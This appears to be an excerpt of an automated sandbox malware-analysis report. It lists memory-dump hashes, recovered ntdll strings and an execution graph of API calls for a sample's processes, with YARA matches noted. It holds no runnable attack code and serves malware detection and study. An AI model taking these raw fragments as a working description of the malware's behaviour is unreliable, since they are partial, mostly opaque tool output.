                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbf68ac6dd64dc1b09cc3dd35af28405d4b45111a14d6af954e9ddb847c7970b
                            • Instruction ID: c413d8af40c955ceedd3b5717554e0171f85bb2ba5f1aa61a71408334e13ce6a
                            • Opcode Fuzzy Hash: dbf68ac6dd64dc1b09cc3dd35af28405d4b45111a14d6af954e9ddb847c7970b
                            • Instruction Fuzzy Hash: B5F0E2716156D09FCF3AD758C148F6177E5BB807A8F099865D486C7752C364CC80CAD0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction ID: 6968e0e61179bc35d7215fe2389b178747321ff7ea657edb27bb42fb1acb1339
                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction Fuzzy Hash: BEE092363016002BD7229E598C84F47776EAFC2B10F050479B9045E252CAF29C0982A4
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75ae97ae55b5b6d007616ca231d06d3bb716df77a68f00a14471931282bef903
                            • Instruction ID: c1dba5a32fdbdb96d7da2b912baf5e7406f350bed0cd815988cc38036f28a4b0
                            • Opcode Fuzzy Hash: 75ae97ae55b5b6d007616ca231d06d3bb716df77a68f00a14471931282bef903
                            • Instruction Fuzzy Hash: 5BF08275B11648ABDB08DFA9D54AE9EB7B4AF08304F500454E606EB3C1EB74DA008754
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b521feabbda72b418564142cd851a560b3b7b0ec3fb1b9e74d6e30f2e1cb662e
                            • Instruction ID: e44e0e3f1eb0f73bdab9ae79faf00313fda473ddd57b005293226663e755e19d
                            • Opcode Fuzzy Hash: b521feabbda72b418564142cd851a560b3b7b0ec3fb1b9e74d6e30f2e1cb662e
                            • Instruction Fuzzy Hash: 37E092322006549BC722BB29DD49F8A7BAAEF54364F114515B12557591CB34A910C784
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 014285a1688fe1973dfc3c553b8313e328f7edeee942a6ede2273814fe4c6a30
                            • Instruction ID: 4c9ead97057bd1e3a82a8e18fda9eb856717f0f67e2c7ea72862f34bff2ce3fe
                            • Opcode Fuzzy Hash: 014285a1688fe1973dfc3c553b8313e328f7edeee942a6ede2273814fe4c6a30
                            • Instruction Fuzzy Hash: BCE0C2322005546BC711FB6DED45F4A77AEEF95260F104221F161876D1CB74FD11C794
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                            • Instruction ID: bdd336fee4bb0829d70a8f25f8c3be3b9089ec5b7ef04147ff4da8929cfb7989
                            • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                            • Instruction Fuzzy Hash: DBD02B31230710EFD7352F14ED08F423B71AF80B10F0404147002164F0C7B0DD41C690
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                            • Instruction ID: 6f3cb8c1a38aff9e6355771ef23a00511681f23e2ea803ed27a98ce9e5f1a3f4
                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                            • Instruction Fuzzy Hash: CFD0A932204620ABE732AA2CFC04FD373E9BB88720F16085AB018C7050C360AC82CA84
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                            • Instruction ID: 00dc097804ef0db33da67e1e98ecb75dcba2735b506b44af487b3eeb6324567d
                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                            • Instruction Fuzzy Hash: D6D02232366030D3CB2896646804F636A1AAF80AA1F1A012D382A93800C2248C43D2E0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                            • Instruction ID: 6049a35f25d7d9d360a2a32abc4f316747e0dc1a10242df7b79faca691b6d6c3
                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                            • Instruction Fuzzy Hash: 14C08C33290648AFD712EFA8CD01F027BB9EB98B40F100822F3048B671C631FD21EA84
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                            • Instruction ID: c8e62268667b2ba130fee30caf26853a974e63f52a16aee0559627cac00a024d
                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                            • Instruction Fuzzy Hash: 35D0E275945A848EE726CB18C165F907BA4B705E40F850098E04247AA2C3689984CA00
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                            • Instruction ID: dd1449b24d2fb37228eb5ad1ee1dc17f3fa1120710b06ca98dd249aa44ae235a
                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                            • Instruction Fuzzy Hash: 3ED0123620024CEFCB12EF41D894DAA772AFBC8710F108019FD19077118A31ED62DA50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                            • Instruction ID: 72ba872efea7a67e02ad1335d169d4ff9d8f8300da2bb8b05eebd6c9c3b72bbc
                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                            • Instruction Fuzzy Hash: 12C08C702415846AEB3B6710CD04F3C3760BB00A06F980D9CAA51295A2C3689C038A18
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction ID: f6b3717219f1fc3ae33101877c2e0790a3883ac4113d61512a9d035e9b659962
                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                            • Instruction Fuzzy Hash: 2CC04879701A458FDF15DB2AD298F9977F8FB44750F150C90E809CBB22E764E901DA11
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b53359a369588e251fbf982a4ebe691657b113e035b7f7e8e9d7f3affd1ecf6f
                            • Instruction ID: fa9c5db650d2e1442cab77fa904cd724a4a7055273c67105207d983e9d01d474
                            • Opcode Fuzzy Hash: b53359a369588e251fbf982a4ebe691657b113e035b7f7e8e9d7f3affd1ecf6f
                            • Instruction Fuzzy Hash: E09002A260150052514071684D44446601997E17013D5C115E0556560C875C89559669
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 818c5df1e7b86d08f69074b9dcad312ef9eafee30350dba725a7e62d00caf15d
                            • Instruction ID: 2b036eb6701d77e48af2079dfee90d8a87016b9406c7aaf6303beea2af304e20
                            • Opcode Fuzzy Hash: 818c5df1e7b86d08f69074b9dcad312ef9eafee30350dba725a7e62d00caf15d
                            • Instruction Fuzzy Hash: 2990026220184452E14072684D44B4F411987E1602FD5C019E4157554CCA5989555B21
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88887f598522a073130cdabf9801480e6bf12f60827d3edd78984d519144584f
                            • Instruction ID: bacda994ed082711a2ff81d5056323fd6fe6c6f0d19b9543ea200174fa4051ac
                            • Opcode Fuzzy Hash: 88887f598522a073130cdabf9801480e6bf12f60827d3edd78984d519144584f
                            • Instruction Fuzzy Hash: 4090026224140812E14071688954747001AC7D0A01F95C011E0026554D875A8A656AB1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e31bbe755577057181250a0eaec6325a2727891245012edca6c658bcb6f55ad7
                            • Instruction ID: a8fd140b463ef6f22a737db3d03c3727bed5b8353723e2f319ca79d23d42071a
                            • Opcode Fuzzy Hash: e31bbe755577057181250a0eaec6325a2727891245012edca6c658bcb6f55ad7
                            • Instruction Fuzzy Hash: C190027260580022A14071684DC4586401997E0701B95C011E0426554C8B588A565761
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e121a098ea7fcddf2ef7f63598e33d0de0fad17c0ab2624f23771c5ee47a2b98
                            • Instruction ID: 1e08dd350e0eb27bbf9df4940ce02b728644980fa8e74fc7052e0222957f11b6
                            • Opcode Fuzzy Hash: e121a098ea7fcddf2ef7f63598e33d0de0fad17c0ab2624f23771c5ee47a2b98
                            • Instruction Fuzzy Hash: 2C90026A21340012E1807168594864A001987D1602FD5D415E0017558CCA5989695721
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fd7739cdf07d2374ffd0597ff7bb5afefcfb2a2d3e9dda3b111aeb28d24f3b9
                            • Instruction ID: 27f1e1cac99b12df112916fc48f98cc3f2bda1d0332f6f566a9f12172fe6e088
                            • Opcode Fuzzy Hash: 1fd7739cdf07d2374ffd0597ff7bb5afefcfb2a2d3e9dda3b111aeb28d24f3b9
                            • Instruction Fuzzy Hash: 2290027220240152A54072685D44A8E411987E1702BD5D415E0017554CCA5889615621
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0323fab8643be6d4c89aeac0eb96b778353abadeed1d5adbcd2668a49e2e563
                            • Instruction ID: 182d475411fd0bd45211aad905f4710ac8ed2fe96938f54b6fe9211e4ed5d666
                            • Opcode Fuzzy Hash: d0323fab8643be6d4c89aeac0eb96b778353abadeed1d5adbcd2668a49e2e563
                            • Instruction Fuzzy Hash: 8D90026220544452E10075685948A46001987D0605F95D011E1066595DC7798951A531
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f214584423719924d9f667117890631645402c41c7229a7107ad1f0881c9b42
                            • Instruction ID: 26d11520bb0cab8579ed8ca3c75fe4e698788f550281f2f9dfd92bfd4ef12003
                            • Opcode Fuzzy Hash: 3f214584423719924d9f667117890631645402c41c7229a7107ad1f0881c9b42
                            • Instruction Fuzzy Hash: 7C90026230140013E140716859586464019D7E1701F95D011E0416554CDA5989565622
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 79991c3a50b320730072350894b7fb99b90e2d44c4adac0e191d3eeb69646c7c
                            • Instruction ID: a9138ae149aa66460faa4897a48e223ec0d1f39eb0dbe82184376d3216bc2bb1
                            • Opcode Fuzzy Hash: 79991c3a50b320730072350894b7fb99b90e2d44c4adac0e191d3eeb69646c7c
                            • Instruction Fuzzy Hash: 3E90027620140412E51071685D44686005A87D0701F95D411E0426558D879889A1A521
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9d3d2c3facc7a8cd140a93726ef4b398920f448a94f4066badcd4b0f1e5b537
                            • Instruction ID: f14a11e60df7b2b59f68a107eb0da092f9e61f90503ee19604f95beb78c6fec1
                            • Opcode Fuzzy Hash: a9d3d2c3facc7a8cd140a93726ef4b398920f448a94f4066badcd4b0f1e5b537
                            • Instruction Fuzzy Hash: E790027224140412E14171684944646001D97D0641FD5C012E0426554E87998B56AE61
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aadb05c5ec05847f30c08c51ae969014e1d23ca13c90260f3d3110d87dc65145
                            • Instruction ID: e03dd7cb7ee505ab62ef265d35423f4c191ba12d7f54e16dcc362efcc991738f
                            • Opcode Fuzzy Hash: aadb05c5ec05847f30c08c51ae969014e1d23ca13c90260f3d3110d87dc65145
                            • Instruction Fuzzy Hash: FA900262242441626545B1684944547401A97E06417D5C012E1416950C866A9956DA21
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54b6498ea859efe87f9fb297a9f3872cb08ad5cc53324341105e0def7b2a950f
                            • Instruction ID: 7eed94a38aefbf05ff7b27db56fbafe9b27e9fbf8d3a16126846ed6cc0b837f3
                            • Opcode Fuzzy Hash: 54b6498ea859efe87f9fb297a9f3872cb08ad5cc53324341105e0def7b2a950f
                            • Instruction Fuzzy Hash: 4790027220140852E10071684944B86001987E0701F95C016E0126654D8759C9517921
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36bca1a9ed7110b3d6fbee89bd96d2be03be6ef4b964d4d9b43463dcc4c72fac
                            • Instruction ID: 47949c2adfcebfc78cd4300f08f963fe70b423ba783cc7f324e185a9aaeba1e4
                            • Opcode Fuzzy Hash: 36bca1a9ed7110b3d6fbee89bd96d2be03be6ef4b964d4d9b43463dcc4c72fac
                            • Instruction Fuzzy Hash: B490027220140412E10075A85948686001987E0701F95D011E5026555EC7A989916531
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 873626021d45746bb2e85686e9e872694d50c0a0f74a008edd2ad56eff3e907a
                            • Instruction ID: 79184c49c2f9e3c1e80683beb26c9efdfa8a432fc97e0744b8d00894dd6a8fcf
                            • Opcode Fuzzy Hash: 873626021d45746bb2e85686e9e872694d50c0a0f74a008edd2ad56eff3e907a
                            • Instruction Fuzzy Hash: D790026260540412E14071685958746002987D0601F95D011E0026554DC79D8B556AA1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0de0a8bae039f963d851b051777758a41f87c50b8590c65fe9cf5d610d0115f9
                            • Instruction ID: e021def23761b196070fc5a06de6755e89f5c850336ca1e3c8b63e585df7f56b
                            • Opcode Fuzzy Hash: 0de0a8bae039f963d851b051777758a41f87c50b8590c65fe9cf5d610d0115f9
                            • Instruction Fuzzy Hash: B490027220140413E10071685A48747001987D0601F95D411E0426558DD79A89516521
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 931989eb4c67fefdba810374505babd8a9075b9c3ebd13889dbbbb6a9a092c78
                            • Instruction ID: 8eba9f4a4e90b2edd1ca4b9c12e5fbfa0a5875850536cd5f0bad0f2d71e34939
                            • Opcode Fuzzy Hash: 931989eb4c67fefdba810374505babd8a9075b9c3ebd13889dbbbb6a9a092c78
                            • Instruction Fuzzy Hash: ED9002A234140452E10071684954B460019C7E1701F95C015E1066554D875DCD526526
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Strings
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 051D4725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 051D4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051D46FC
                            • Execute=1, xrefs: 051D4713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 051D4742
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 051D4787
                            • ExecuteOptions, xrefs: 051D46A0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            Strings
                            • RTL: Resource at %p, xrefs: 051D7B8E
                            • RTL: Re-Waiting, xrefs: 051D7BAC
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 051D7B7F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051D728C
                            Strings
                            • RTL: Resource at %p, xrefs: 051D72A3
                            • RTL: Re-Waiting, xrefs: 051D72C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 051D7294
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            APIs
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 051ECFBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: CallFilterFunc@8
                            • String ID: @$@4_w@4_w
                            • API String ID: 4062629308-713214301

                            Execution Graph

                            Execution Coverage:2.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.7%
                            Total number of Nodes:414
                            Total number of Limit Nodes:66
RtlFreeHeap 83815->83816 83817 6d9f20 RtlFreeHeap 83815->83817 83816->83815 83817->83815 83819 6e251e 83818->83819 83820 6e2525 83818->83820 83819->83801 83821 6d4530 2 API calls 83820->83821 83822 6e2557 83821->83822 83823 6e2566 83822->83823 83842 6e1fe0 LdrLoadDll LdrLoadDll 83822->83842 83825 6ea040 RtlAllocateHeap 83823->83825 83828 6e2701 83823->83828 83827 6e257f 83825->83827 83826 6e9f60 RtlFreeHeap 83826->83828 83827->83826 83827->83828 83828->83801 83830 6d9be6 83829->83830 83843 6dd3e0 83830->83843 83832 6d9c4d 83834 6d9dd0 83832->83834 83835 6d9c6b 83832->83835 83833 6d9db5 83833->83801 83834->83833 83836 6d9a80 RtlFreeHeap 83834->83836 83835->83833 83848 6d9a80 83835->83848 83836->83834 83839 6d9f46 83838->83839 83840 6dd3e0 RtlFreeHeap 83839->83840 83841 6d9fc2 83840->83841 83841->83803 83842->83823 83845 6dd3f6 83843->83845 83844 6dd403 83844->83832 83845->83844 83846 6e9f60 RtlFreeHeap 83845->83846 83847 6dd43c 83846->83847 83847->83832 83849 6d9a96 83848->83849 83852 6dd450 83849->83852 83851 6d9b9c 83851->83835 83853 6dd45d 83852->83853 83854 6dd50c 83853->83854 83855 6e9f60 RtlFreeHeap 83853->83855 83854->83851 83855->83854
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 006DBFF1
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 006DC02E
                            • FindClose.KERNELBASE(?), ref: 006DC039
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                            • Instruction ID: 1e0bd4d7de82a268bf2917782d7000a81e9c62c3bc133aeb5a6f5125b938f629
                            • Opcode Fuzzy Hash: 03df0c96aadce4d9b275498f232f119dc3e907a31d9c2f37b287d084dc2341f8
                            • Instruction Fuzzy Hash: 4C31CD72900348ABDB20DF60CC85FEF73BE9B45754F14455DBA08AB281DA71AA848BA4
                            APIs
